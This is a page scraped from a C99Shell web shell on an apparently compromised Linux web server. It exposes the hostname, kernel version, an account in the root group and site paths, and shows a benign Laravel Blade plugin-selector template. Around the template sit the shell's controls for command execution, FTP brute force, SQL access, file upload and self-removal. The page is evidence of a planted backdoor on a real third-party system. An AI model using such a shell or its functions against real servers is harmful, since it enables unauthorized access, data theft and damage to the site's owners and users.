!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/resources/views/plans/   drwxr-xr-x
Free 27.22 GB of 117.98 GB (23.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     plugins.blade.php (913 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="row">
    <div class="col-md-6 mt-3">
        <h6 class="heading-small text-muted mb-4">{{ __('Plugins') }}</h6>
        <label for="pluginsSelector">{{ __('Select available plugins or leave empty for all') }}</label><br />
        <select style="height: 200px" name="pluginsSelector[]" multiple="multiple" class="form-control noselecttwo"  id="pluginsSelector">
            <?php
                $perviousPlans
=isset($plan)?json_decode($plan->getConfig('plugins','[]'),false):[];
                
            
?>
            @foreach ($allplugins as $plugin)
                <option @if (is_array($perviousPlans)&&in_array($plugin->alias,$perviousPlans))
                    selected
                @endif id="plugin{{$plugin->alias}}" value="{{$plugin->alias}}">{{ strlen($plugin->name)>0?$plugin->name:ucfirst($plugin->alias) }}</option>
            @endforeach
        </select>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--